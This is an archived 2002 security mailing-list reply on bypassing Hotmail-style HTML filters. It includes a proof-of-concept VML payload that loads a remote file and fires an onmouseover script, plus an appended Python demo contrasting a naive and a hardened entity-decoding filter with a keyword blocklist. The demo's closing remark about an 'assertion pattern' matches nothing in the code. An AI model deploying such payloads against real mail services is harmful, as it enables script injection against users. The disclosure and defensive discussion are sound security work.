Vulnerability Development mailing list archives
Re: double decoding filter bypass (Hotmail) + challenge for you
From: "http-equiv () excite com" <http-equiv () malware com>
Date: Wed, 17 Jul 2002 23:16:35 -0000
<!-- So what about Hotmail? Well, where can we put unicode in an html message? Into an url as %xx, yep, but that's not the point here. There is a thing called "html entities": you can replace *any* printable character by its ascii/unicode value in the values of the parameters of html tags, for instance in the parameters of the STYLE tag (hint!). "A" is A, "B" is B, etc.

What the Hotmail filter did is replacing any html entity by its corresponding character, then trying to filter out any bad string (forbidden keywords), THEN giving the output to the user, without re-applying the filter on this output. But, if there are still html entities in this output, the user's browser will interpret them, which will possibly give birth to some interesting forbidden keywords... and fire a script. -->

Excellent. Here's another one for you FozZy:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
<v:vmlframe style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; HEIGHT: 200px" src = "http://www.malware.com/fooness.vml#malware"></v:vmlframe>

where fooness.vml#malware is:

<xml xmlns:v = "urn:schemas-microsoft-com:vml">
<v:rect id="malware" fillcolor="green" style="position:relative;top:1;left:1;width:20;height:20" onmouseover="alert('malware was here')">
</v:rect>
</xml>

1. This works on Yahoo and Excite, probably others
2. Quick fiddling suggests only mouseover works
3. Hotmail only filters this:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

which is absolutely required. Probably easier to mask than say "Javascript".

note 1: can't recall, Hotmail may not allow for retrieval of files remotely, or base64 encodes them on the Hotmail server if there are any. If so, you can embed and CID: the fooness.vml
note 2: the above may also work in IE dependent mail clients (Eudora..?..)
note 3: doesn't want to work in Outlook Express with scripting off even though the frame aspect works - which is patched in OE6

--
http://www.malware.com
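The decode-then-filter flaw quoted above, shown as an added example that is not part of this thread and not Hotmail's code: a hypothetical keyword blocklist, a flawed pipeline that unescapes once and never re-checks its output, and a hardened pipeline that matches on fully decoded text and re-applies decode+filter until the output is stable. The message body and the blocklist are constructed for the demo.

```python
import html
import re

# Hypothetical keyword blocklist standing in for a webmail filter (assumption,
# not Hotmail's real rules): script URLs, CSS behaviors and on* event handlers.
FORBIDDEN = re.compile(r"javascript:|behavior\s*:|\bon[a-z]+\s*=", re.IGNORECASE)

# Constructed message body: the event-handler name is entity-encoded twice
# (&amp;#111; -> &#111; -> o), which is the double-decoding case described above.
SAMPLE = ('<v:rect style="width:20" '
          '&amp;#111;nmouseover="alert(1)">hi</v:rect>')


def decode_to_fixpoint(text: str, limit: int = 8) -> str:
    """Unescape entities until nothing changes, so nested encodings are undone."""
    for _ in range(limit):
        decoded = html.unescape(text)
        if decoded == text:
            return text
        text = decoded
    raise ValueError("entity nesting deeper than expected")


def naive_filter(body: str) -> str:
    """The flawed pipeline: decode entities once, strip keywords, emit the result
    without checking whether the output still contains anything decodable."""
    return FORBIDDEN.sub("", html.unescape(body))


def hardened_filter(body: str, limit: int = 8) -> str:
    """Match on fully decoded text, then re-apply decode+filter to the output
    until it is stable, so the client cannot decode anything the filter missed."""
    current = decode_to_fixpoint(body)
    for _ in range(limit):
        cleaned = FORBIDDEN.sub("", decode_to_fixpoint(current))
        if cleaned == current:
            return current
        current = cleaned
    raise ValueError("filter output did not stabilise")


def browser_view(markup: str) -> str:
    """Approximation of the client: attribute text is entity-decoded once more."""
    return html.unescape(markup)


if __name__ == "__main__":
    for name, fn in (("naive", naive_filter), ("hardened", hardened_filter)):
        out = fn(SAMPLE)
        print(f"{name:8} -> {out!r}")
        print(f"{'':8}    client sees: {browser_view(out)!r}")
```

The second assertion pattern worth keeping is the stability check: stripping a keyword can itself produce a new keyword, which is exactly why the post says the filter must be re-applied to its own output.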
Current thread:
- double decoding filter bypass (Hotmail) + challenge for you FozZy (Jul 15)
- Re: double decoding filter bypass (Hotmail) + challenge for you http-equiv () excite com (Jul 17)